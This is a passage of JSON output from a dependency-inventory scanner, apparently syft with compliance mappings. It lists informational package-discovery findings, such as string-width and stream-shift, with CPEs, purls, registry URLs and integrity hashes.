"locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/standard-as-callback@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz", "integrity": "sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4830d30cd7a05603", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: statuses 2.0.2", "title": "statuses 2.0.2", "description": "Package discovered: statuses 2.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7442cb30a409bd68", "name": "statuses", "version": "2.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/statuses@2.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz", "integrity": "sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fce9dfc2e720150a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "startLine": 0 }, "message": "Package discovered: stdlib go1.20.12", "title": "stdlib go1.20.12", "description": "Package discovered: stdlib go1.20.12", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "755a3e00c5f656c9", "name": "stdlib", "version": "go1.20.12", "type": "go-module", "foundBy": "go-module-binary-cataloger", "locations": [ { "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "accessPath": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [] } ], "language": "go", "cpes": [ { "cpe": "cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:golang/stdlib@1.20.12", "metadataType": "go-module-buildinfo-entry", "metadata": { "goCompiledVersion": "go1.20.12", "architecture": "" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "684726e125b93b59", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/esbuild/bin/esbuild", "startLine": 0 }, "message": "Package discovered: stdlib go1.20.12", "title": "stdlib go1.20.12", "description": "Package discovered: stdlib go1.20.12", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e9a4a6eb4de31a0f", "name": "stdlib", "version": "go1.20.12", "type": "go-module", "foundBy": "go-module-binary-cataloger", "locations": [ { "path": "/node_modules/esbuild/bin/esbuild", "accessPath": "/node_modules/esbuild/bin/esbuild", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [] } ], "language": "go", "cpes": [ { "cpe": "cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:golang/stdlib@1.20.12", "metadataType": "go-module-buildinfo-entry", "metadata": { "goCompiledVersion": "go1.20.12", "architecture": "" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "12c7b9072b4ac0c3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: stream-events 1.0.5", "title": "stream-events 1.0.5", "description": "Package discovered: stream-events 1.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d6075f31d1f26f1b", "name": "stream-events", "version": "1.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/stream-events@1.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", "integrity": "sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==", "dependencies": { "stubs": "^3.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "42a667b9f8ef2c86", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: stream-shift 1.0.3", "title": "stream-shift 1.0.3", "description": "Package discovered: stream-shift 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1acff9076c855611", "name": "stream-shift", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/stream-shift@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz", "integrity": "sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "89e93178704235e4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: streamsearch 1.1.0", "title": "streamsearch 1.1.0", "description": "Package discovered: streamsearch 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c7163598759ab751", "name": "streamsearch", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/streamsearch@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz", "integrity": "sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d28f82c740f787aa", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: string-width 4.2.3", "title": "string-width 4.2.3", "description": "Package discovered: string-width 4.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6c7ed5b8c0bd71e8", "name": "string-width", "version": "4.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/string-width@4.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a6a2288a986748af", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: string-width 5.1.2", "title": "string-width 5.1.2", "description": "Package discovered: string-width 5.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "303a44f8f6ca903e", "name": "string-width", "version": "5.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/string-width@5.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", "dependencies": { "eastasianwidth": "^0.2.0", "emoji-regex": "^9.2.2", "strip-ansi": "^7.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d318d3d155c6a9dd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: string_decoder 1.1.1", "title": "string_decoder 1.1.1", "description": "Package discovered: string_decoder 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "829e7f04cb28f180", "name": "string_decoder", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/string_decoder@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": 